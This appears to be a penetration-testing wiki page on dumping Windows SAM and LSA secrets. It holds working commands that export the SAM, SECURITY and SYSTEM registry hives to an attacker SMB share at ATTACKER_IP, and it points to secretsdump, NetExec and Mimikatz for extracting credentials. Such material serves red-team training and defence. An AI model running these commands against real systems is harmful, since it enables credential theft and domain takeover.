SAM & LSA secrets
MITRE ATT&CK™ Sub-techniques T1003.002, T1003.004 and T1003.005
Theory
In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
SAM
stores locally cached credentials (referred to as SAM secrets)
LM or NT hashes
SECURITY
stores domain cached credentials (referred to as LSA secrets)
Plaintext passwords
LM or NT hashes
Kerberos keys (DES, AES)
Domain Cached Credentials (DCC1 and DCC2)
Security Questions (L$SQSA<SID>)
SYSTEM
contains enough info to decrypt SAM secrets and LSA secrets
N/A
SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.
Plaintext passwords
LM and NT hashes
Kerberos keys (RC4, i.e. == NT hash)
Kerberos keys (DES, AES)
Domain Cached Credentials (DCC1 or DCC2)
Practice
Exfiltration
Impacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.
The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.
# start an SMB share
smbserver.py -smb2support "someshare" "./"
# save each hive manually
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IPs\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'
# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\ATTACKER_IP\someshare'When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"This operation can be conducted remotely with BackupOperatoToDA (C++).
The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.
BackupOperatorToDA.exe -d "domain" -u "user" -p "password" -t "target" -o "\\ATTACKER_IP\someshare"When Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.
Secrets dump
Here are some examples and tools that can be used for local/remote/offline dumping.
Impacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).
NetExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
Mimikatz can be used locally with lsadump::sam and lsadump::secrets to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.
Resources
Last updated
Was this helpful?